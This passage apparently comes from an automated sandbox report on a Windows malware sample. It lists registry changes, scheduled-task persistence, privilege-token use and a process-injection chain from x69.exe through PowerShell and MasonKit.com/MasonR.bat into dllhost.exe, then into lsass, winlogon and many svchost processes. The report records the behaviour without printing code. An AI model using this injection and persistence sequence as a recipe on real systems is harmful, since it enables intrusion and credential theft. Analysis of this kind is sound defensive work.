Set value (data) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = 9e1a053afcc8db01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = "\\\\?\\Volume{6746542D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c11525ea1ed9d0d7159ff70dbf7f87bd47271147dcfa922bb64e44b154675868" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002c25023afcc8db012c25023afcc8db012c25023afcc8db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b35a3da32000633131353235656131656439643064373135396666373064626637663837626434373237313134376463666139323262623634653434623135343637353836380000b20009000400efbeb35a3da3b35a3da32e00000000000000000000000000000000000000000000000000d4a9b500630031003100350032003500650061003100650064003900640030006400370031003500390066006600370030006400620066003700660038003700620064003400370032003700310031003400370064006300660061003900320032006200620036003400650034003400620031003500340036003700350038003600380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008c9cb60b1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63313135323565613165643964306437313539666637306462663766383762643437323731313437646366613932326262363465343462313534363735383638000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062616d7564746b710000000000000000d0afe384b7e060428074769582fbd8402a6160966527f011b64c6674a9969650d0afe384b7e060428074769582fbd8402a6160966527f011b64c6674a9969650d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003300340032003500370036003700360033002d0031003900390038003400360035003500320036002d0033003800370030003200390035003500300031002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002d544667000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = ff856e3afcc8db01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = "0" C:\Windows\System32\RuntimeBroker.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\x69.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 380 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\x69.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 380 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\x69.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1700 wrote to memory of 5688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\MasonKit.com
PID 1700 wrote to memory of 5688 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\MasonKit.com
PID 380 wrote to memory of 5296 N/A C:\Users\Admin\AppData\Local\Temp\x69.exe C:\Windows\System32\schtasks.exe
PID 380 wrote to memory of 5296 N/A C:\Users\Admin\AppData\Local\Temp\x69.exe C:\Windows\System32\schtasks.exe
PID 5688 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\MasonKit.com C:\Users\Admin\AppData\Local\Temp\MasonR.bat
PID 5688 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\MasonKit.com C:\Users\Admin\AppData\Local\Temp\MasonR.bat
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 3160 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe
PID 4812 wrote to memory of 616 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 4812 wrote to memory of 668 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 4812 wrote to memory of 948 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 376 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 4812 wrote to memory of 540 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1028 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1100 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1140 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1160 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1240 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1248 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1304 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 668 wrote to memory of 2868 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 4812 wrote to memory of 1324 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1408 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1468 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1584 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1608 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1640 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1728 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1744 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1832 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1968 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 1988 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2020 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 1596 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 2068 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2084 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 2164 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 4812 wrote to memory of 2320 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 2328 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 2548 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\sihost.exe
PID 4812 wrote to memory of 2580 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2592 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2604 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2756 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2788 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2804 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskhostw.exe
PID 4812 wrote to memory of 2852 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 2868 N/A C:\Windows\System32\dllhost.exe C:\Windows\sysmon.exe
PID 4812 wrote to memory of 2888 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4812 wrote to memory of 2896 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4812 wrote to memory of 3124 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\unsecapp.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

